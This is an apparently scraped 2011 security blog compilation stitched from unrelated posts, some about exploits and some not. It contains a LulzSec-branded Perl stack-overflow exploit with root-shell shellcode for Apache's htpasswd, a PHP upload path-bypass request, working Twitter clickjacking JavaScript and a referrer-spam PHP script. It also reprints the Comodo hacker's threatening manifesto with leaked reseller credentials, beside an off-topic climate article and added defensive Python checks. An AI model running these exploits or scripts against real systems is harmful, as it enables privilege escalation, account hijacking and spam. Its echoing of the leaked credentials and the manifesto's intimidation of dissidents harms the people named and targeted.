Here is the code :)
IRC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
[ASCII-art banner: the LulzSec logo with the tagline "Laughing at your security since 2011!", and a ship captioned "SET SAIL FOR FAIL!"]
Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemies be overwhelmed with our Lulz!
===========================================
#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec
#
# Note: this is a local exploit, not a remote one. It execs Apache's
# htpasswd with an oversized user name on the command line (-n: print to
# stdout, -b: password given on the command line) and overflows a stack
# buffer inside htpasswd; nothing is sent over the network.
#
# x86 Linux shellcode: setuid(0) via int 0x80 (eax=23), then
# execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80 (eax=11).
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
# Guess the address of $ENV{XXX}: environment strings sit just below the
# top of the stack (0xbffffffa on 32-bit Linux without ASLR), preceded by
# the program path, so subtract both lengths.
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
# Put the shellcode into the environment so it ends up on htpasswd's stack.
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);   # little-endian 32-bit return address
$buffer = "A" x 272;             # filler up to the saved return address
$buffer .= $newret x 4;          # overwrite it (repeated for slack)
$buffer .= " ";                  # separates the user name from the password
$buffer .= "B" x 290;            # password argument for -b
exec("$target -nb $buffer");
Webmasters are advised to patch their PHP installations manually: a serious flaw that could let attackers delete files from a site's root directory has been publicly disclosed.
The vulnerability lies in the SAPI_POST_HANDLER_FUNC() function in rfc1867.c, the handler for multipart/form-data uploads. By placing a forward or back slash before the file name in an upload, an attacker can get a name through that still carries the slash. This can be used, for example, to delete files from the root directory, or combined with other vulnerabilities to enhance an attack. The flaw is described as an input validation error and security bypass. Vulnerability research vendor Secunia rates it as "less critical". A Polish web application developer, Krzysztof Kotowicz, is credited with discovering and reporting the issue; although it was patched on June 12, details of the flaw have been available online since May 27.
The vulnerability, identified as CVE-2011-2202, affects PHP 5.3.6 and earlier versions. No new package has been released yet, but the patch can be fetched from the repository and applied manually. Exploitation does not require authentication; it has a partial impact on system integrity and on confidentiality.
It is still unclear whether its access complexity should be rated low, as listed in an IBM X-Force advisory, or high, as the Red Hat security team considers it.
Exploit found on pastebin.com
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass"
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass
PHP script:
=====
<?php
// Minimal upload handler used for the test: echo the client-supplied file
// name exactly as PHP stored it, then discard the temporary file.
if (!empty($_FILES['contents'])) { // process file upload
    echo $_FILES['contents']['name'];
    unlink($_FILES['contents']['tmp_name']);
}
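To make the path-stripping bug concrete, here is an added example in Python (my own code, not from the article, from Kotowicz or from the PHP project). rfc1867_strip_path models the separator-stripping step of rfc1867.c described above in both its PHP 5.3.6 and patched forms; build_upload and build_request reproduce the request shown above with a correct Content-Length; parse_filename is what a server starts from; and safe_basename is the application-side check an upload handler should apply to $_FILES['name'] whatever the PHP version. The upload content, the function names and the character whitelist are this example's own choices.

```python
import re

# Boundary and field name taken from the HTTP request above; the upload
# content is constructed for this example.
BOUNDARY = "----------ThIs_Is_tHe_bouNdaRY_$"


def rfc1867_strip_path(filename: str, fixed: bool) -> str:
    """Model of the 'Strip path from file name' step in PHP's main/rfc1867.c.

    The C code locates the last '\\' or '/' (pointer s) and stores s+1 as
    $_FILES[...]['name'].  PHP <= 5.3.6 only did that when 's > filename',
    i.e. when the separator was not the very first byte, so a name whose
    only separator is a leading slash or backslash was stored untouched.
    The fix changed the comparison to 's >= filename'.
    """
    s = filename.rfind("\\")
    t = filename.rfind("/")
    if t > s:
        s = t
    if s == -1:                 # no separator at all (s == NULL in C)
        return filename
    if fixed or s > 0:          # the buggy build skips the strip at offset 0
        return filename[s + 1:]
    return filename


def safe_basename(name: str) -> str:
    """Application-side check: never trust $_FILES[...]['name'] as a path
    component, even on a patched PHP.  Rejects empty/dot names and anything
    outside a conservative character set (the whitelist is this example's)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError("empty or dot-only file name: %r" % name)
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,255}", base):
        raise ValueError("unexpected characters in file name: %r" % name)
    return base


def build_upload(field: str, filename: str, content: bytes,
                 boundary: str = BOUNDARY) -> bytes:
    """Build the multipart/form-data body of the request shown above."""
    delim = ("--" + boundary).encode()
    disposition = 'Content-Disposition: form-data; name="%s"; filename="%s"' % (field, filename)
    return b"\r\n".join([
        delim,
        disposition.encode(),
        b"Content-Type: text/plain",
        b"",
        content,
        delim + b"--",
        b"",
    ])


def build_request(path: str, host: str, body: bytes, boundary: str = BOUNDARY) -> bytes:
    """Wrap the body in an HTTP/1.0 POST with a correct Content-Length."""
    headers = (
        "POST %s HTTP/1.0\r\n"
        "Host: %s\r\n"
        "Content-Type: multipart/form-data; boundary=%s\r\n"
        "Content-Length: %d\r\n\r\n" % (path, host, boundary, len(body))
    )
    return headers.encode() + body


def parse_filename(body: bytes) -> str:
    """Pull the filename parameter back out of a multipart body, which is
    the string the server-side handler starts from."""
    m = re.search(rb'filename="([^"\r\n]*)"', body)
    if not m:
        raise ValueError("no filename in body")
    return m.group(1).decode()


if __name__ == "__main__":
    name = "/anything.here.slash-will-pass"
    body = build_upload("contents", name, b"any")
    print(build_request("/file-upload-fuzz/recv_dump.php", "blog.security.localhost", body).decode())
    got = parse_filename(body)
    print("PHP <= 5.3.6 stores :", rfc1867_strip_path(got, fixed=False))
    print("patched PHP stores  :", rfc1867_strip_path(got, fixed=True))
    print("app-side basename   :", safe_basename(got))
```

Run it and the first two lines of output show the difference the patch makes: the unpatched model returns the name with its leading slash, the patched one returns anything.here.slash-will-pass. The backslash case behaves the same way, which matters for Windows hosts. Whatever PHP does, safe_basename is the line of defence that belongs in the application, because a later bug of the same family would bypass a fix that lives only in the interpreter.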
A French pentester released a proof of concept (PoC) of a clickjacking attack on the Twitter follow button. Here is how it works, and here is the code:
// Fallback for browsers without document.getElementsByClassName (IE7):
// return the first element whose class attribute equals the name.
if (!document.getElementsByClassName) {
    document.getElementsByClassName = function (classname) {
        var all = document.getElementsByTagName("*");
        for (var i = 0; i < all.length; i++) {
            if (all.item(i).className == classname) {
                return new Array(all.item(i));
            }
        }
        return new Array();
    };
}
// The Twitter follow button is an iframe: make it nearly transparent and
// take it out of the page flow so it can be moved freely.
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';              // '0' makes it fully invisible
twitterFollowIframe.style.filter = 'alpha(opacity=20)'; // IE7 equivalent of opacity
// Keep the iframe under the mouse pointer, so wherever the visitor clicks,
// the click lands on the follow button (units added: lengths need 'px').
document.onmousemove = function (e) {
    if (!e) e = window.event;
    twitterFollowIframe.style.left = (e.clientX - 20) + 'px';
    twitterFollowIframe.style.top = (e.clientY - 10) + 'px';
};
You can find the proof of concept at this page: http://serphacker.com/twitter-follow-clickjacking.html
The destination server is down at the moment, so here is the PoC source with 20% opacity:
[PoC page content: title "SERP Hacker"; a "Follow SERP Hacker" Twitter button; note: tested on Firefox 3 and IE7]
Just move the mouse and click anywhere: if you are already logged in to Twitter, you will automatically follow my account. Remember that the button can be made totally invisible by setting the opacity to 0.
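The PoC above works because nothing stops serphacker.com from putting Twitter's button inside a frame. The check on the framed site's side is an X-Frame-Options or Content-Security-Policy frame-ancestors header. The added Python example below (my own code, not part of the PoC and not Twitter's actual configuration) models how a browser decides from those headers whether a page may be framed by a given origin, and runs that decision over constructed header sets. The origins used are illustrative; Twitter's real response headers are not known here, and the host-source matching is a simplified version of the CSP rules.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url: str):
    """(scheme, host, port) of an origin string, with the default port filled in."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme)


def _same_origin(a: str, b: str) -> bool:
    return _origin(a) == _origin(b)


def _host_source_matches(src: str, page_origin: str, framer_origin: str) -> bool:
    """Simplified CSP host-source matching: optional scheme, host with an
    optional leading '*.', optional port.  Path components are ignored."""
    f_scheme, f_host, f_port = _origin(framer_origin)
    src = src.lower()
    if src.endswith(":") and "/" not in src:        # scheme-only source, e.g. "https:"
        return src[:-1] == f_scheme
    if "://" in src:
        s_scheme, rest = src.split("://", 1)
        if s_scheme != f_scheme:
            return False
    else:
        rest = src
        # no scheme given: the framer must use the page's scheme (https always passes)
        if f_scheme not in (_origin(page_origin)[0], "https"):
            return False
    host, _, port = rest.split("/", 1)[0].partition(":")
    if port == "":
        if f_port != DEFAULT_PORTS.get(f_scheme):    # no port means the default port
            return False
    elif port != "*" and int(port) != f_port:
        return False
    if host.startswith("*."):
        return f_host.endswith(host[1:])              # "*.example.com" covers any subdomain
    return f_host == host


def _frame_ancestors_allows(sources, page_origin: str, framer_origin: str) -> bool:
    allowed = False
    for src in sources:
        src = src.lower()
        if src == "'none'":
            return False
        if src == "'self'":
            allowed = allowed or _same_origin(page_origin, framer_origin)
        elif src == "*":
            allowed = True
        else:
            allowed = allowed or _host_source_matches(src, page_origin, framer_origin)
    return allowed


def frameable(headers: dict, page_origin: str, framer_origin: str) -> bool:
    """Would a browser render page_origin inside a frame hosted on framer_origin?

    Models the two headers the framed site can send: CSP frame-ancestors,
    which takes precedence when present, and X-Frame-Options DENY /
    SAMEORIGIN.  With neither, any site can frame the page, which is what
    the PoC above relies on.
    """
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return _frame_ancestors_allows(tokens[1:], page_origin, framer_origin)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _same_origin(page_origin, framer_origin)
    return True


if __name__ == "__main__":
    # Constructed header sets for illustration; not Twitter's real responses.
    cases = {
        "no policy": {},
        "XFO DENY": {"X-Frame-Options": "DENY"},
        "XFO SAMEORIGIN": {"X-Frame-Options": "SAMEORIGIN"},
        "CSP self + subdomains": {"Content-Security-Policy": "frame-ancestors 'self' https://*.twitter.com"},
    }
    for label, hdrs in cases.items():
        ok = frameable(hdrs, "https://twitter.com", "http://serphacker.com")
        print("%-22s framed by serphacker.com: %s" % (label, ok))
```

Only the first case prints True. Note the caveat for this particular PoC: a follow button is a widget meant to be embedded on any site, so its provider cannot simply answer DENY; for embeddable widgets the defence has to be in the widget itself (for instance a confirmation step after the click), and the headers above are the check for ordinary pages that should never be framed.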
It is with these words that the Swedish Minister for the Environment, Andreas Carlgren, concluded this staged trial of humankind, held in Stockholm on May 17, 2011 on the sidelines of the third Nobel laureates' symposium on sustainability. Twenty renowned scientists who have received that prestigious award took part.
The aim of this staged trial is to determine to what extent current generations have lost their relationship with the planet, and how that relationship can be "restored" over the coming years: to rectify both the excesses of the past decades and the lack of conscientiousness on these issues seen at the international level since the first world conference on climate change, held in Geneva in 1979.
However, the trial remains purely symbolic: the specialists have no legal standing and, in the words of Mario Molina, scientific adviser to Barack Obama, can put forward nothing more than "a rational analysis and a demonstration of common sense". The jury's conclusions will mainly feed a memorandum to be handed to a group set up within the United Nations by its Secretary-General, Ban Ki-moon, ahead of the UN conference on sustainable development to be held in Rio de Janeiro in 2012.
Energy, and more precisely its production, remains a major stake in our future development according to the latest public report of the IPCC (Intergovernmental Panel on Climate Change). That report, released on 9 May this year in Abu Dhabi, presents as its most optimistic scenario that by 2050, 77% of global energy consumption could come from renewable sources, provided appropriate public policies are implemented.
Thanks to Lilian Guyon for this article and his involvement in sustainable development.
We decided to publish this article because the whole devquotes team believes in a green future, and this kind of meeting HAS to be supported by YOU. Retweet this article as much as possible.
Here is the message from the Comodo hacker:
At first sight I thought it was a BIG fake. But that incredible guy, with the biggest ego I have ever seen, really did it. I am spreading the rumours here; better for you to form your own opinion:
———-
Hello
I’m writing this to the world, so you’ll know more about me..
At first I want to give some points, so you’ll be sure I’m the hacker: I hacked Comodo from InstantSSL.it, their CEO’s e-mail address [email protected]
Their Comodo username/password was: user: gtadmin password: [trimmed]
Their DB name was: globaltrust and instantsslcms
GlobalTrust.it had a dll called TrustDLL.dll for handling Comodo requests, they had resellers and their url was:
http://www.globaltrust.it/reseller_admin/
Enough said, huh? Yes, enough said, someone who should know already knows... Am I right Mr. Abdulhayoglu? Anyway, at first I should mention we have no relation to the Iranian Cyber Army, we don't change DNSes, we just hack and own.
I see Comodo's CEO and others wrote that it was a managed attack, it was a planned attack, a group of cyber criminals did it, etc. etc. etc.
Let me explain:
a) I'm not a group of hackers, I'm a single hacker with the experience of 1000 hackers, I'm a single programmer with the experience of 1000 programmers, I'm a single planner/project manager with the experience of 1000 project managers, so you are right, it's managed by a group of hackers, but it was only I with the experience of 1000 hackers.
b) It was not really a managed hack. At first I decided to hack the RSA algorithm, I did too much investigation on the SSL protocol, tried to find an algorithm for factoring integers, analyzed existing algorithms; for now I was not able to do so, at least not yet, but I know it's not impossible and I'll prove it, anyway... I saw that there are easier ways of doing it, like hacking a CA. I was looking to hack some CAs like Thawte, Verisign, Comodo, etc. I found some small vulnerabilities in their servers, but it wasn't enough to gain access to a server and sign my CSRs. During my search about InstantSSL of Comodo, which signs CSRs immediately, I found InstantSSL.it which was doing its job under the control of Comodo.
After a little try, I analyzed their web server and easily (easy for me, so hard for others) I got FULL access to the server; after a little investigation on their server, I found out that TrustDll.dll takes care of signing. It was coded in C# (ASP.NET). I decompiled the DLL and I found the username/password of their GeoTrust and Comodo reseller accounts.
The GeoTrust reseller URL was not working, it was in ADTP.cs. Then I found out their Comodo account works and the Comodo URL is active. I logged into the Comodo account and I saw I have the right of signing using APIs. I had no idea of the APIs and how they work. I wrote code for signing my CSRs using POST requests to those APIs, I learned their APIs so FAST, and their TrustDLL.DLL was too old and was not working properly, it doesn't send all needed parameters, it wasn't enough for signing a CSR. As I said, I rewrote the code for the !AutoApplySSL and !PickUpSSL APIs; the first API returns the OrderID of the placed order and the second API returns the entire signed certificate if you pass the OrderID from the previous call. I learned all this stuff, re-wrote the code and generated CSRs for those sites all in about 10-15 minutes. I wasn't ready for these types of APIs, these types of CSR generation, API calling, etc. But I did it very very fast.
Anyway, I know you are really shocked about my knowledge, my skill, my speed, my expertise and the entire attack. That's OK, all of it was so easy for me, I did more important things I can't talk about, so if you have to worry, you can worry... I should mention my age is 21.
Let's get back to the reason for posting this message. I'm talking to the world, so listen carefully:
When the USA and Israel created Stuxnet, nobody talked about it, nobody was blamed, nothing happened at all, so when I sign certificates nothing should happen, I say that, when I sign certificates nothing should happen. It's a simple deal.
I heard that some stupid people tried to ask Iran's ambassador at the UN about it, really? How smart-ass are you?
Where were you when Stuxnet was created by Israel and the USA with a budget of millions of dollars, with access to SCADA systems and nuclear software? Why did no one ask a question of the Israeli and US ambassadors to the UN? So you can't ask my ambassador about the SSL situation; I answer your question about the situation: "Ask the USA and Israel about Stuxnet", this is your answer, so don't waste my Iran's ambassador's worthy time.
When the USA and Israel can read my emails in Yahoo, Hotmail, Skype, Gmail, etc. without any simple little problem, when they can spy using Echelon, I can do anything I can. It's a simple rule. You do, I do, that's all. You stop, I don't stop. It's a rule, rule #1 (My Rules, as I rule the internet, you should know it already...)
Rule #2: So why is the whole world worried, the internet shocked and all writers writing about it, but nobody writes about Stuxnet anymore? Nobody writes about HAARP, nobody writes about Echelon... So nobody should write about SSL certificates.
Rule #3: Anyone inside Iran with problems, from the fake green movement to all MKO members and two-faced terrorists, should be afraid of me personally. I won't let anyone inside Iran harm the people of Iran, harm my country's nuclear scientists, harm my Leader (which nobody can), harm my President; as long as I live, you won't be able to do so. As long as I live, you don't have privacy on the internet, you don't have security in the digital world, just wait and see... By the way, you have already seen it or you are blind: is there any larger target than a CA on the internet?
Rule #4: Comodo and other CAs in the world: never think you are safe, never think you can rule the internet, ruling the world with a 256-digit number which nobody can find the 2 prime factors of (you think so). I'll show you how someone of my age can rule the digital world, how your assumptions are wrong; you already understood it, huh?
Rule #5: To Microsoft, Mozilla and Chrome, who updated their software as soon as instructions came from the CIA. You are my targets too. Why was Stuxnet's printer vulnerability patched after 2 years? Because it was needed in Stuxnet? So you'll learn that sometimes you have to close your eyes on some stuff on the internet, you'll learn... You'll understand... I'll bring equality to the internet. My orders will be equal to CIA orders, lol ;)
Rule #6: I'm a GHOST
Rule #7: I'm unstoppable, so be afraid if you should be afraid, worry if you should worry. My message to people who have a problem with the Islamic Republic of Iran: SSL and RSA certificates are broken, I did it one time, be sure I'll do it again, but this time nobody will notice it. I see some people suggest using VPNs, some people suggest TOR, some others suggest UltraSurf, etc. Are you sure you are safe using those? RSA 2048 was not able to resist in front of me, do you think UltraSurf can? If you were doing a dirty business on the internet inside Iran, I suggest you quit your job, listen to the voice of most of the people of Iran, otherwise you'll be in big trouble; you can also leave the digital world and return to using an abacus.
A message in Persian: Janam Fadaye Rahbar
Source : http://pastebin.com/74KXCaEZ
——————-
Some stupid people on the internet still cannot understand I'm behind the attack on SSL, talk about their small understanding of my hack and make me nervous.
Why can't you understand? What's your problem? If you have psychological or mental problems, don't write your ideas on the internet, just surf, ok?
Here is another proof:
http://rapidshare.com/files/454806052/GlobalTrustTable.rar
I uploaded JUST 1 table of their ENTIRE database which I own.
Also ask Comodo about my hack, ask them what I did to them. Let me tell you what I did:
I was logged in to their server via RDP (remote desktop), they detected me and, via a hardware firewall, they added an allowed IP for RDP, so I was no longer able to log in via RDP.
But I got UI control of their server just 2 days later, then I logged in via Roberto Franchini's user/pass, then I formatted their external backup HDD; it was an LG with a backup of all files inside it. I formatted it.
Then I stopped IIS, deleted all logs, not a normal delete which could be recovered with recovery tools; I deleted them with a secure delete method and in fact I wiped them.
Then I noticed another backup on another drive, I deleted ALL files of it with the secure wiping method also, and I left this session open with a notepad message on their desktop with this text: "SURPRISE!"
What more I should say?
Stop talking about who was behind it, it’s already proven.
Some people say Microsoft wasn't aware of the issue to patch the printer vulnerability. It's simply wrong, it was in a security magazine; you never saw this:
http://www.computerworld.com/s/article/9187300/Microsoft_confirms_it_missed_Stuxnet_print_spooler_zero_day_
Some others said I don’t know about RSA, it’s impossible to hack RSA, etc. etc. etc.
Never judge so fast, never write anything you think in your head on the internet; most of my daily work focuses on encryption algorithms, differential cryptanalysis, inventing new methods of attack on encryption algorithms, creating new secure encryption algorithms (symmetric and asymmetric), creating a secure hash algorithm. I told you, I can't talk about other things I did, I don't see any use for it, just giving away my work and causing more updates. So simply keep your mouth shut and wait. I already created my own encryption protocol, from an asymmetric algorithm (for key exchange) to a symmetric algorithm for encrypting data to my own hash algorithm to sign encrypted algorithms. You are so far from knowing about me...
Some others say the APIs were easy, it was all documented, everything was inside the DLL, so what did I do about re-writing APIs; a person with the experience of 1000 programmers had problems with APIs, LOL.
Do you know how much code I wrote in C++ and assembly language? Do you know how much work I did in reversing Skype and its undisclosed protocol? Man! I create my own APIs, from web SOAP XML APIs to Windows DLLs with exports.
I said I wasn’t aware of !ApplySSL API and other needed APIs like PickUpSSL and others.
I found that out when I was already logged into Comodo Partner’s account and I was sure they’ll notice me soon, so I had to do my job fast.
TrustDLL.dll was too old, its last modified date was the end of 2007, Comodo's APIs had changed and a lot more crucial parameters had been added; they weren't using TrustDLL anymore, and as far as I understood, they were processing and authenticating orders and signing CSRs manually. They had not had many orders in recent years, about 1 order per 4-5 days for example. So don't worry, I'm aware of the APIs ;)
Some others said I'm not religious, "Janam Fadaye Rahbar" is political, not religious; you are simply wrong. No need to explain more.
Some others said I said too much about myself and enjoyed myself too much; if you had done the same thing, wouldn't you enjoy it like me? :))
Again my message to the green movement (so small a part of Iran) and two-faced terrorists like MKO members inside Iran: never think UltraSurf, VPNs, SSL, TOR will rescue you... My name will be your curse. You are all in big trouble if you don't quit your job. Don't believe it, try it. From now on, just try it. Your friend will post about you on balatarin, as you won't be able to do so after being caught.
Enough said, huh? Let’s think more before writing stuff…
Source : http://pastebin.com/CvGXyfiJ
—————————-
Comodo Hacker Released Mozilla Certificate
For some real dumb people, I bet they don't have an IQ above 75, WHO STILL think I'm not the hacker, here is the Mozilla addon's certificate; check its serial against the one published all over the internet:
http://www.multiupload.com/J9I8NFWPT0
I really worry about you guys (people who still have doubts), even for surfing the internet; have you ever visited a doctor?
Source : http://pastebin.com/X8znzPWH
—————————————-
Comodo Mozilla Private key
-----BEGIN RSA PRIVATE KEY-----
[key material removed from this copy]
-----END RSA PRIVATE KEY-----
It's more of a psychological trap for the SEO admin who checks his stats 20 times a day :)

Let's take an example: you own a website directory listing pizzerias. For the example, we'll call it "pizzeria-master-huge-directory.com".
To begin with, you created the content yourself: you scraped Google manually, searched for pizzerias in every city you know and wrote 10 or 20 entries.
Now let's think. The website is running, you have a decent position in the SERPs and you want to expand your visibility.
Here is the point: you want every pizzeria present on the internet to come to your site, register and write an entry in your directory THEMSELVES.
You would get fresh new content without doing anything.
But HOW TO DO THAT?
Until you rank in the top 3, very few people will come and register by themselves.
The idea I had (and I'm not the first) is to tell those pizzeria owners that you exist and that your directory can bring them a little traffic.
Here comes scripting :)
Don't think about e-mail spam; it's a waste of time. Nobody cares about spam, and getting the admin's e-mail address directly is hard.
Just remember what you did every day or week when you were an SEO beginner:
The trick is not to get in touch with the webmaster by mail; it is to set a kind of trap. Just wait for the webmaster to look up "which website is sending me SPECIALIZED traffic". Remember that your victim owns "pizzeria-jose.com" and is about to notice that "pizzeria-master-huge-directory.com" is sending him a little traffic.
As an SEO newbie, he will go to "pizzeria-master-huge-directory.com" and check the site, he will even try to understand "how this website sent me traffic", and he may finally register and create an entry in the directory.
See what I mean?
Now remember what you did at the beginning, and let's automate this part: request each target site with the directory's address in the Referer header, so that the directory shows up in the target's referrer statistics.
The trap is now set :D
You only have to wait for all those SEO rookies to check their analytics stats. (Note that this only works for statistics built from the server logs or from a server-side counter; a JavaScript tracker such as Google Analytics never sees a curl request, because the tracking script is never executed.)
I didn't measure the ROI of this trick; I think it depends entirely on your business.
I just know that this trap costs nothing to set up and can bring you targeted webmasters who are potentially interested in subscribing to "pizzeria-master-huge-directory.com".
<?php
// Fetch $url once with a forged Referer header, so that the target site's
// referrer statistics record pizzeria-master-huge-directory.com as a
// traffic source.  $proxy is accepted for a later version but not used here.
function fake_referrer($url, $proxy = false) {
    $ch = curl_init();
    // Old IE user agent, so the hit looks like an ordinary visitor.
    $userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)';
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   // return the body instead of printing it
    curl_setopt($ch, CURLOPT_REFERER, "http://www.pizzeria-master-huge-directory.com/");
    $result = curl_exec($ch);
    // echo curl_error($ch);
    curl_close($ch);
    return $result;
}

// $site_list holds the target sites (normally scraped from Google, see below);
// one entry is given here so the script runs as-is.
$site_list = array('http://www.pizzeria-jose.com/');
print_r($site_list);
foreach ($site_list as $ws) {
    fake_referrer($ws);
}
I won't explain here how to scrape Google; it's not the purpose of this post. All you need is to put your target list in the $site_list array.
I hope this article was helpful. As always, if anything is needed, just ask in the comments :)
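Seen from the other side of the trap, the forged referrer only shows up in log-based statistics, and those hits have a signature. As an added example (my own code, not part of the post), here is a Python script that parses Apache combined-format log lines for the target site and flags referrer hosts whose visits look scripted rather than browsed. The log lines, the IP addresses and the three heuristics are constructed for the example; the user agent and referrer of the fake hits are the ones the script above sends.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Page assets a real browser fetches right after a page view.
ASSET_EXT = (".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".ico")

# Constructed sample log for pizzeria-jose.com: three fake-referrer hits
# like the PHP script above produces, plus two genuine referrals.
SAMPLE_LOG = """\
203.0.113.10 - - [20/May/2011:09:12:01 +0200] "GET / HTTP/1.1" 200 5120 "http://www.pizzeria-master-huge-directory.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
198.51.100.7 - - [20/May/2011:12:40:15 +0200] "GET / HTTP/1.1" 200 5120 "http://www.google.com/search?q=pizzeria+jose" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
198.51.100.7 - - [20/May/2011:12:40:15 +0200] "GET /style.css HTTP/1.1" 200 812 "http://www.pizzeria-jose.com/" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
198.51.100.7 - - [20/May/2011:12:40:16 +0200] "GET /logo.png HTTP/1.1" 200 3301 "http://www.pizzeria-jose.com/" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
203.0.113.10 - - [21/May/2011:09:12:03 +0200] "GET / HTTP/1.1" 200 5120 "http://www.pizzeria-master-huge-directory.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
192.0.2.44 - - [21/May/2011:19:05:40 +0200] "GET /menu.html HTTP/1.1" 200 2210 "http://www.yelp.com/biz/pizzeria-jose" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 Safari/534.30"
192.0.2.44 - - [21/May/2011:19:05:41 +0200] "GET /style.css HTTP/1.1" 200 812 "http://www.pizzeria-jose.com/menu.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 Safari/534.30"
203.0.113.10 - - [22/May/2011:09:12:02 +0200] "GET / HTTP/1.1" 200 5120 "http://www.pizzeria-master-huge-directory.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
"""


def parse_log(text: str):
    """Parse combined-format lines into dicts; lines that don't match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def referrer_report(entries, own_host: str, min_hits: int = 3):
    """Group hits by external referrer host and score each one.

    Heuristics (assumptions made for this example, not a standard):
      - a real visitor's browser fetches CSS/images after the page, so a
        client that never requests an asset is unlikely to be a browser;
      - a single user agent across every hit points at a script;
      - a single client IP across every hit does as well.
    A referrer is marked suspect when it reaches min_hits, no referred
    client ever fetched an asset, and all hits share one user agent.
    """
    assets_by_ip = defaultdict(int)
    by_ref = defaultdict(list)
    for e in entries:
        if e["path"].lower().endswith(ASSET_EXT):
            assets_by_ip[e["ip"]] += 1
        host = (urlsplit(e["referer"]).hostname or "").lower()
        if host and host != own_host.lower():      # ignore the site's own internal links
            by_ref[host].append(e)
    report = {}
    for host, hits in by_ref.items():
        uas = {h["ua"] for h in hits}
        ips = {h["ip"] for h in hits}
        fetched_assets = any(assets_by_ip[ip] for ip in ips)
        reasons = []
        if len(uas) == 1:
            reasons.append("single user agent")
        if len(ips) == 1:
            reasons.append("single client IP")
        if not fetched_assets:
            reasons.append("no page assets fetched by referred clients")
        report[host] = {
            "hits": len(hits),
            "reasons": reasons,
            "suspect": len(hits) >= min_hits and not fetched_assets and len(uas) == 1,
        }
    return report


if __name__ == "__main__":
    for host, info in referrer_report(parse_log(SAMPLE_LOG), "www.pizzeria-jose.com").items():
        flag = "SUSPECT" if info["suspect"] else "ok     "
        print("%s %-45s hits=%d  %s" % (flag, host, info["hits"], "; ".join(info["reasons"])))
```

On the sample, only www.pizzeria-master-huge-directory.com is flagged: three page views from one address with one user agent and not a single stylesheet or image fetched, while the Google and Yelp referrals each come with the asset requests a browser makes. The min_hits threshold is there so that a single genuine visit is never flagged on the strength of one user agent alone.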
You may have heard about a recent security hole in facebook.com (the #2 website in the Alexa ranking). The pages of French president Nicolas Sarkozy and of Facebook CEO Mark Zuckerberg were recently hijacked.
How it works: the hackers used a cross-site scripting (XSS) vulnerability to steal cookies.
French security website zataz.com has just released an article about the method used. A hacker used a fake identity, a certain Roy Castillo. The hackers used many identities, but that "Roy" was the most influential one. As heard on Twitter and Zataz, the hackers even bought the domain fr-fr-facebook.net to convince people to enter their personal information. Be careful if that "Roy" or someone else you don't know invites you to join groups: they are all hosted on infected pages!
For information, this security hole was publicly reported yesterday (26/01/11) and fixed this morning (27/01/11).
Here is a mirror of the infected Facebook page with the working XSS vulnerability.
